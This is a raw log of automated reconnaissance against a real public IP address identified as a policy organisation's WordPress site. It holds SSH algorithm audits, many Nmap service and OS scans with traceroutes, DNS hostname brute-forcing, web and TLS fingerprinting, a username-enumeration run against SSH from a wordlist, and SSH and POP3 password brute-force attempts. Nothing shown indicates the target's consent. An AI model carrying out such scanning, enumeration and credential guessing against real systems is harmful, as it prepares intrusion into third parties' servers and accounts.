- `- [info] available since OpenSSH 2.1.0
- (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- # message authentication code algorithms
- (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.5.0
- (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.1.0
- (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
- (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0
- # algorithm recommendations (for OpenSSH 5.3)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -ssh-dss -- key algorithm to remove
- (rec) -arcfour -- enc algorithm to remove
- (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -arcfour256 -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -arcfour128 -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-md5-96 -- mac algorithm to remove
- (rec) -hmac-ripemd160 -- mac algorithm to remove
- (rec) -hmac-sha1-96 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-md5 -- mac algorithm to remove
- (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 11:58 EST
- WARNING: RST from 198.57.177.19 port 22 -- is this port really open?
- WARNING: RST from 198.57.177.19 port 22 -- is this port really open?
- WARNING: RST from 198.57.177.19 port 22 -- is this port really open?
- WARNING: RST from 198.57.177.19 port 22 -- is this port really open?
- WARNING: RST from 198.57.177.19 port 22 -- is this port really open?
- WARNING: RST from 198.57.177.19 port 22 -- is this port really open?
- Nmap scan report for 198-57-177-19.unifiedlayer.com (198.57.177.19)
- Host is up (0.26s latency).
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- |_ssh-auth-methods: ERROR: Script execution failed (use -d to debug)
- |_ssh-brute: ERROR: Script execution failed (use -d to debug)
- |_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
- |_ssh-run: ERROR: Script execution failed (use -d to debug)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Konica Minolta 1600f printer (98%), Motorola RFS 6000 wireless switch (95%), ZyXEL ZyWALL 2 firewall or Prestige 660HW-61 ADSL router (ZyNOS 3.62) (93%), FreeBSD 6.2-RELEASE (91%), OpenBSD 4.0 (91%), Papouch TME Ethernet thermometer (90%), Apple AirPort Extreme WAP (89%), OpenBSD 4.3 (89%), D-Link DI-808HV router (89%), Sony PCS-TL30 video conferencing system (88%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 20 hops
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 122.92 ms 10.246.200.1
- 2 122.96 ms 190.124.251.129
- 3 122.99 ms 172.16.21.1
- 4 182.93 ms ip4-91-205-233-128.rdns.racklodge.com (91.205.233.128)
- 5 183.10 ms 192.168.7.2
- 6 183.13 ms edge2.xe0-0-14.globalmarket-4.mia007.pnap.net (63.251.152.229)
- 7 183.54 ms core2.t6-1.bbnet1.mia003.pnap.net (69.25.0.2)
- 8 184.15 ms be-124-pe01.nota.fl.ibone.comcast.net (96.87.8.61)
- 9 185.37 ms be-12274-cr02.miami.fl.ibone.comcast.net (68.86.82.153)
- 10 212.05 ms be-12224-cr02.dallas.tx.ibone.comcast.net (68.86.86.142)
- 11 250.86 ms be-12124-cr02.1601milehigh.co.ibone.comcast.net (68.86.84.229)
- 12 249.89 ms be-12021-cr01.champa.co.ibone.comcast.net (68.86.84.225)
- 13 260.04 ms be-7922-ar01.saltlakecity.ut.utah.comcast.net (68.86.90.226)
- 14 263.71 ms po-1-rur01.orem.ut.utah.comcast.net (162.151.9.186)
- 15 264.30 ms be-11-sur03.orem.ut.utah.comcast.net (162.151.9.190)
- 16 275.24 ms 50.225.56.182
- 17 271.29 ms eth3-33-3.prvspn002.net.unifiedlayer.com (162.144.240.159)
- 18 260.25 ms po99.prv-leaf3b.net.unifiedlayer.com (162.144.240.55)
- 19 270.66 ms po97.prv-leaf3a.net.unifiedlayer.com (162.144.240.43)
- 20 256.16 ms 198-57-177-19.unifiedlayer.com (198.57.177.19)
- #######################################################################################################################################
- USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
- RHOSTS => 198.57.177.19
- RHOST => 198.57.177.19
- [*] 198.57.177.19:22 - SSH - Using malformed packet technique
- [*] 198.57.177.19:22 - SSH - Starting scan
- [-] 198.57.177.19:22 - SSH - User 'admin' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'administrator' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'anonymous' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'backup' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'bee' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'ftp' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'guest' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'GUEST' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'info' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'mail' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'mailadmin' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'msfadmin' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'mysql' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'nobody' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'oracle' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'owaspbwa' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'postfix' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'postgres' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'private' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'proftpd' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'public' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'root' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'superadmin' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'support' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'sys' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'system' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'systemadmin' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'systemadministrator' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'test' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'tomcat' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'user' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'webmaster' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'www-data' on could not connect
- [-] 198.57.177.19:22 - SSH - User 'Fortimanager_Access' on could not connect
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 12:08 EST
- Nmap scan report for 198-57-177-19.unifiedlayer.com (198.57.177.19)
- Host is up (0.26s latency).
- PORT STATE SERVICE VERSION
- 53/tcp open domain ISC BIND
- |_dns-fuzz: Server didn't response to our probe, can't fuzz
- | dns-nsec-enum:
- |_ No NSEC records found
- | dns-nsec3-enum:
- |_ DNSSEC NSEC3 not supported
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|firewall|storage-misc|VoIP phone
- Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
- OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
- Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 19 hops
- Host script results:
- | dns-blacklist:
- | SPAM
- |_ l2.apews.org - SPAM
- | dns-brute:
- | DNS Brute-force hostnames:
- | ns0.unifiedlayer.com - 67.20.126.9
- | ns1.unifiedlayer.com - 162.159.24.11
- | ns2.unifiedlayer.com - 162.159.25.92
- | vnc.unifiedlayer.com - 74.220.195.38
- | vpn.unifiedlayer.com - 74.220.198.228
- | whois.unifiedlayer.com - 74.220.195.39
- | www.unifiedlayer.com - 162.144.8.133
- | mgmt.unifiedlayer.com - 50.87.241.55
- | mirror.unifiedlayer.com - 69.195.127.230
- | helpdesk.unifiedlayer.com - 67.20.126.249
- |_ cdn.unifiedlayer.com - 74.220.195.201
- TRACEROUTE (using port 53/tcp)
- HOP RTT ADDRESS
- 1 122.34 ms 10.246.200.1
- 2 122.37 ms 190.124.251.129
- 3 122.74 ms 172.16.21.1
- 4 182.19 ms ip4-91-205-233-128.rdns.racklodge.com (91.205.233.128)
- 5 182.21 ms 192.168.7.2
- 6 182.82 ms edge2.xe0-0-14.globalmarket-4.mia007.pnap.net (63.251.152.229)
- 7 182.81 ms core2.t6-2.bbnet2.mia003.pnap.net (69.25.0.66)
- 8 307.41 ms mai-b1-link.telia.net (62.115.12.169)
- 9 182.82 ms 80.239.196.186
- 10 257.07 ms vb2000d2.rar3.sanjose-ca.us.xo.net (207.88.13.102)
- 11 257.74 ms 207.88.12.224.ptr.us.xo.net (207.88.12.224)
- 12 257.74 ms 207.88.12.195.ptr.us.xo.net (207.88.12.195)
- 13 257.75 ms 207.88.12.188.ptr.us.xo.net (207.88.12.188)
- 14 257.35 ms 207.88.12.191.ptr.us.xo.net (207.88.12.191)
- 15 257.35 ms 216.156.16.25
- 16 258.79 ms 216.51.74.158
- 17 264.58 ms eth3-33-1.prvspn001.net.unifiedlayer.com (162.144.240.139)
- 18 258.09 ms po99.prv-leaf3a.net.unifiedlayer.com (162.144.240.47)
- 19 256.73 ms 198-57-177-19.unifiedlayer.com (198.57.177.19)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 12:09 EST
- Nmap scan report for 198-57-177-19.unifiedlayer.com (198.57.177.19)
- Host is up (0.042s latency).
- PORT STATE SERVICE VERSION
- 67/udp open|filtered dhcps
- |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
- Too many fingerprints match this host to give specific OS details
- Network Distance: 19 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 121.96 ms 10.246.200.1
- 2 122.00 ms 190.124.251.129
- 3 122.03 ms 172.16.21.1
- 4 181.99 ms ip4-91-205-233-128.rdns.racklodge.com (91.205.233.128)
- 5 182.03 ms 192.168.7.2
- 6 182.05 ms edge2.xe0-0-14.globalmarket-4.mia007.pnap.net (63.251.152.229)
- 7 182.46 ms core2.t6-1.bbnet1.mia003.pnap.net (69.25.0.2)
- 8 182.43 ms mai-b1-link.telia.net (62.115.12.169)
- 9 191.65 ms 80.239.196.186
- 10 256.76 ms vb2000d2.rar3.sanjose-ca.us.xo.net (207.88.13.102)
- 11 257.21 ms 207.88.12.224.ptr.us.xo.net (207.88.12.224)
- 12 259.11 ms 207.88.12.195.ptr.us.xo.net (207.88.12.195)
- 13 257.14 ms 207.88.12.188.ptr.us.xo.net (207.88.12.188)
- 14 256.12 ms 207.88.12.191.ptr.us.xo.net (207.88.12.191)
- 15 255.88 ms 216.156.16.25.ptr.us.xo.net (216.156.16.25)
- 16 257.68 ms 216.51.74.158
- 17 261.42 ms eth3-33-2.prvspn002.net.unifiedlayer.com (162.144.240.163)
- 18 257.29 ms po99.prv-leaf3b.net.unifiedlayer.com (162.144.240.55)
- 19 257.29 ms 198-57-177-19.unifiedlayer.com (198.57.177.19)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 12:11 EST
- Nmap scan report for 198-57-177-19.unifiedlayer.com (198.57.177.19)
- Host is up (0.040s latency).
- PORT STATE SERVICE VERSION
- 68/udp open|filtered dhcpc
- Too many fingerprints match this host to give specific OS details
- Network Distance: 19 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 122.77 ms 10.246.200.1
- 2 122.35 ms 190.124.251.129
- 3 122.38 ms 172.16.21.1
- 4 182.22 ms ip4-91-205-233-128.rdns.racklodge.com (91.205.233.128)
- 5 182.20 ms 192.168.7.2
- 6 182.59 ms edge2.xe0-0-14.globalmarket-4.mia007.pnap.net (63.251.152.229)
- 7 182.62 ms core2.t6-1.bbnet1.mia003.pnap.net (69.25.0.2)
- 8 182.61 ms mai-b1-link.telia.net (62.115.12.169)
- 9 182.58 ms 80.239.196.186
- 10 257.05 ms vb2000d2.rar3.sanjose-ca.us.xo.net (207.88.13.102)
- 11 256.28 ms 207.88.12.224.ptr.us.xo.net (207.88.12.224)
- 12 256.47 ms 207.88.12.195.ptr.us.xo.net (207.88.12.195)
- 13 256.44 ms 207.88.12.188.ptr.us.xo.net (207.88.12.188)
- 14 256.58 ms 207.88.12.191.ptr.us.xo.net (207.88.12.191)
- 15 266.14 ms 216.156.16.25.ptr.us.xo.net (216.156.16.25)
- 16 257.53 ms 216.51.74.158
- 17 261.52 ms eth3-33-2.prvspn002.net.unifiedlayer.com (162.144.240.163)
- 18 258.07 ms po99.prv-leaf3b.net.unifiedlayer.com (162.144.240.55)
- 19 257.54 ms 198-57-177-19.unifiedlayer.com (198.57.177.19)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 12:13 EST
- Nmap scan report for 198-57-177-19.unifiedlayer.com (198.57.177.19)
- Host is up (0.043s latency).
- PORT STATE SERVICE VERSION
- 69/udp open|filtered tftp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 19 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 121.80 ms 10.246.200.1
- 2 121.86 ms 190.124.251.129
- 3 121.89 ms 172.16.21.1
- 4 181.70 ms ip4-91-205-233-128.rdns.racklodge.com (91.205.233.128)
- 5 181.76 ms 192.168.7.2
- 6 182.08 ms edge2.xe0-0-14.globalmarket-4.mia007.pnap.net (63.251.152.229)
- 7 183.76 ms core2.t6-1.bbnet1.mia003.pnap.net (69.25.0.2)
- 8 183.30 ms mai-b1-link.telia.net (62.115.12.169)
- 9 182.91 ms 80.239.196.186
- 10 256.54 ms vb2000d2.rar3.sanjose-ca.us.xo.net (207.88.13.102)
- 11 257.96 ms 207.88.12.224.ptr.us.xo.net (207.88.12.224)
- 12 259.46 ms 207.88.12.195.ptr.us.xo.net (207.88.12.195)
- 13 257.68 ms 207.88.12.188.ptr.us.xo.net (207.88.12.188)
- 14 270.91 ms 207.88.12.191.ptr.us.xo.net (207.88.12.191)
- 15 257.24 ms 216.156.16.25.ptr.us.xo.net (216.156.16.25)
- 16 257.84 ms 216.51.74.158
- 17 262.12 ms eth3-33-2.prvspn002.net.unifiedlayer.com (162.144.240.163)
- 18 258.25 ms po99.prv-leaf3b.net.unifiedlayer.com (162.144.240.55)
- 19 270.42 ms 198-57-177-19.unifiedlayer.com (198.57.177.19)
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://198.57.177.19...
- _________________ SITE INFO _________________
- IP Title
- 198.57.177.19
- __________________ VERSION __________________
- Name Versions Type
- Apache 2.4.38 Platform
- mod_bwlimited 1.4 Platform
- openssl 1.0.2q Platform
- _____________________________________________
- Time: 1.9 sec Urls: 601 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 200 OK
- Date: Wed, 06 Feb 2019 17:16:12 GMT
- Last-Modified: Wed, 30 Jan 2019 02:06:03 GMT
- ETag: "a3-580a35a1678c0"
- Accept-Ranges: bytes
- Content-Length: 163
- Content-Type: text/html
- Connection: keep-alive
- HTTP/1.1 200 OK
- Date: Wed, 06 Feb 2019 17:16:12 GMT
- Last-Modified: Wed, 30 Jan 2019 02:06:03 GMT
- ETag: "a3-580a35a1678c0"
- Accept-Ranges: bytes
- Content-Length: 163
- Content-Type: text/html
- Connection: keep-alive
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 12:16 EST
- Nmap scan report for 198-57-177-19.unifiedlayer.com (198.57.177.19)
- Host is up (0.17s latency).
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Dovecot pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- | Statistics: Performed 65 guesses in 59 seconds, average tps: 0.9
- |_ ERROR: Failed to connect.
- |_pop3-capabilities: STLS RESP-CODES CAPA SASL(PLAIN LOGIN) UIDL PIPELINING AUTH-RESP-CODE USER TOP
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|firewall|storage-misc|VoIP phone
- Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
- OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
- Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 2.6.39 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 3.10 (89%), Linux 3.4 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 1 hop
- TRACEROUTE (using port 80/tcp)
- HOP RTT ADDRESS
- 1 121.78 ms 198-57-177-19.unifiedlayer.com (198.57.177.19)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 12:17 EST
- Nmap scan report for 198-57-177-19.unifiedlayer.com (198.57.177.19)
- Host is up.
- PORT STATE SERVICE VERSION
- 123/udp open|filtered ntp
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 122.00 ms 10.246.200.1
- 2 122.00 ms 190.124.251.129
- 3 122.02 ms 172.16.21.1
- 4 182.13 ms ip4-91-205-233-128.rdns.racklodge.com (91.205.233.128)
- 5 182.15 ms 192.168.7.2
- 6 183.32 ms edge2.xe0-0-14.globalmarket-4.mia007.pnap.net (63.251.152.229)
- 7 182.35 ms core2.t6-1.bbnet1.mia003.pnap.net (69.25.0.2)
- 8 182.55 ms mai-b1-link.telia.net (62.115.12.169)
- 9 182.18 ms 80.239.196.186
- 10 256.62 ms vb2000d2.rar3.sanjose-ca.us.xo.net (207.88.13.102)
- 11 256.94 ms 207.88.12.224.ptr.us.xo.net (207.88.12.224)
- 12 257.16 ms 207.88.12.195.ptr.us.xo.net (207.88.12.195)
- 13 257.35 ms 207.88.12.188.ptr.us.xo.net (207.88.12.188)
- 14 256.18 ms 207.88.12.191.ptr.us.xo.net (207.88.12.191)
- 15 256.14 ms 216.156.16.25.ptr.us.xo.net (216.156.16.25)
- 16 257.33 ms 216.51.74.158
- 17 261.34 ms eth3-33-2.prvspn002.net.unifiedlayer.com (162.144.240.163)
- 18 257.51 ms po99.prv-leaf3b.net.unifiedlayer.com (162.144.240.55)
- 19 ... 30
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 12:19 EST
- Nmap scan report for 198-57-177-19.unifiedlayer.com (198.57.177.19)
- Host is up (0.12s latency).
- PORT STATE SERVICE VERSION
- 161/tcp filtered snmp
- 161/udp open|filtered snmp
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 123.47 ms 10.246.200.1
- 2 123.52 ms 190.124.251.129
- 3 123.55 ms 172.16.21.1
- 4 183.41 ms ip4-91-205-233-128.rdns.racklodge.com (91.205.233.128)
- 5 183.36 ms 192.168.7.2
- 6 183.72 ms edge2.xe0-0-14.globalmarket-4.mia007.pnap.net (63.251.152.229)
- 7 183.79 ms core2.t6-1.bbnet1.mia003.pnap.net (69.25.0.2)
- 8 184.16 ms mai-b1-link.telia.net (62.115.12.169)
- 9 183.79 ms 80.239.196.186
- 10 258.18 ms vb2000d2.rar3.sanjose-ca.us.xo.net (207.88.13.102)
- 11 257.55 ms 207.88.12.224.ptr.us.xo.net (207.88.12.224)
- 12 258.10 ms 207.88.12.195.ptr.us.xo.net (207.88.12.195)
- 13 257.55 ms 207.88.12.188.ptr.us.xo.net (207.88.12.188)
- 14 267.61 ms 207.88.12.191.ptr.us.xo.net (207.88.12.191)
- 15 256.51 ms 216.156.16.25.ptr.us.xo.net (216.156.16.25)
- 16 257.90 ms 216.51.74.158
- 17 262.09 ms eth3-33-2.prvspn002.net.unifiedlayer.com (162.144.240.163)
- 18 257.66 ms po99.prv-leaf3b.net.unifiedlayer.com (162.144.240.55)
- 19 ... 30
- #######################################################################################################################################
- https://198.57.177.19 [200 OK] Apache[2.4.38][mod_bwlimited/1.4], Country[UNITED STATES][US], Email[info@jcpa.org], Frame, Google-Analytics[Universal][UA-39298142-1,UA-39298142-2], HTML5, HTTPServer[Apache/2.4.38 (cPanel) OpenSSL/1.0.2q mod_bwlimited/1.4], IP[198.57.177.19], JQuery[1.12.4], Open-Graph-Protocol[website], OpenSSL[1.0.2q], Script[application/ld+json,text/javascript], ShareThis, Title[Jerusalem Center For Public Affairs], WordPress, WordpressSuperCache, YouTube
- #######################################################################################################################################
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 198.57.177.19
- Testing SSL server 198.57.177.19 on port 443 using SNI name 198.57.177.19
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 256 bits CAMELLIA256-SHA
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-SEED-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 128 bits SEED-SHA
- Accepted TLSv1.2 128 bits CAMELLIA128-SHA
- Accepted TLSv1.2 128 bits IDEA-CBC-SHA
- Accepted TLSv1.2 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits RC4-SHA
- Accepted TLSv1.2 128 bits RC4-MD5
- Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
- Accepted TLSv1.2 112 bits DES-CBC3-SHA
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 256 bits CAMELLIA256-SHA
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits DHE-RSA-SEED-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 128 bits SEED-SHA
- Accepted TLSv1.1 128 bits CAMELLIA128-SHA
- Accepted TLSv1.1 128 bits IDEA-CBC-SHA
- Accepted TLSv1.1 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits RC4-SHA
- Accepted TLSv1.1 128 bits RC4-MD5
- Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
- Accepted TLSv1.1 112 bits DES-CBC3-SHA
- Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 256 bits CAMELLIA256-SHA
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits DHE-RSA-SEED-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 128 bits SEED-SHA
- Accepted TLSv1.0 128 bits CAMELLIA128-SHA
- Accepted TLSv1.0 128 bits IDEA-CBC-SHA
- Accepted TLSv1.0 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits RC4-SHA
- Accepted TLSv1.0 128 bits RC4-MD5
- Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
- Accepted TLSv1.0 112 bits DES-CBC3-SHA
- SSL Certificate:
